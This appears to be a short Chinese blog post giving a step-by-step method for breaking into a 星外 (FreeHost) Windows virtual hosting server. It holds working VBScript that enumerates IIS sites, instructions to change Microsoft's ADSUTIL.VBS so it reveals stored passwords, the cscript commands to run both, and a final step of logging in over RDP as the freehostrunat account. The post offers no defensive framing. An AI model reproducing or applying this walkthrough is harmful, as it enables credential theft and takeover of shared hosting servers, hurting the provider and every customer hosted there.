|
1.确定是星外,一般网站目录为d:\freehost\xxx
2.找到可执行目录:参照:http://hi.baidu.com/it%5Fsecurity/blog/item/111ef5eb39ed86c6d539c981.html
3.传cmd.exe,cscript.exe,两个vbs:
'1.vbs
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ")& obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
'用来查看 星外管理平台虚拟目录的id,C:\WINDOWS\7i24.com\FreeHost
'2.vbs
''''''''''''''''''''''''''''''''''''
'
' ADSUTIL.VBS
'
' Date: 7/24/97
' Revision History:
' Date Comment
' 7/24/97 Initial version started
' 5/8/98 Bug fixes and ENUM_ALL
' 12/1/98 Fixed display error on list data.
' 7/27/99 AppCreate2 fix
' 8/5/99 Dont display encrypted data
''''''''''''''''''''''''''''''''''''
Option Explicit
On Error Resume Next
''''''''''''''''''
' Main Script Code
''''''''''''''''''
Dim ArgObj ' Object which contains the command line argument
Dim Result ' Result of the command function call
Dim Args(999) ' Array that contains all of the non-global arguments
Dim ArgCount ' Tracks the size of the Args array
' Used for string formatting
Dim Spacer
Dim SpacerSize
Const IIS_DATA_NO_INHERIT = 0
Const IIS_DATA_INHERIT = 1
Const GENERAL_FAILURE = 2
Const GENERAL_WARNING = 1
Const AppCreate_InProc = 0
Const AppCreate_OutOfProc = 1
Const AppCreate_PooledOutOfProc = 2
Const APPSTATUS_NOTDEFINED = 2
Const APPSTATUS_RUNNING = 1
Const APPSTATUS_STOPPED = 0
Spacer = " " ' Used to format the strings
SpacerSize = Len(Spacer)
' Note: The default execution mode may be under WScript.exe.
' That would be very annoying since WScript has popups for Echo.
' So, I want to detect that, and warn the user that it may cause
' problems.
DetectExeType
' Get the Arguments object
Set ArgObj = WScript.Arguments
' Test to make sure there is at least one command line arg - the command
'太长了,自己从c:\inetpub\adminscritps\adsutil.vbs,改下”IsSecureProperty = True”更改为”IsSecureProperty = False”。
'用来查看密码
4.执行:
/c "x:\xxx\cscript.exe" c:\xxxx\1.vbs
得到iis的信息,找到星外id,
再执行:
/c "x:\xxx\cscript.exe" c:\xxxx\2.vbs enum w3svc/ID/root ’这儿id是第一个执行的数字
5.看到密码后,直接3389使用freehostrunat登录吧。
|
推荐
评论(0条)
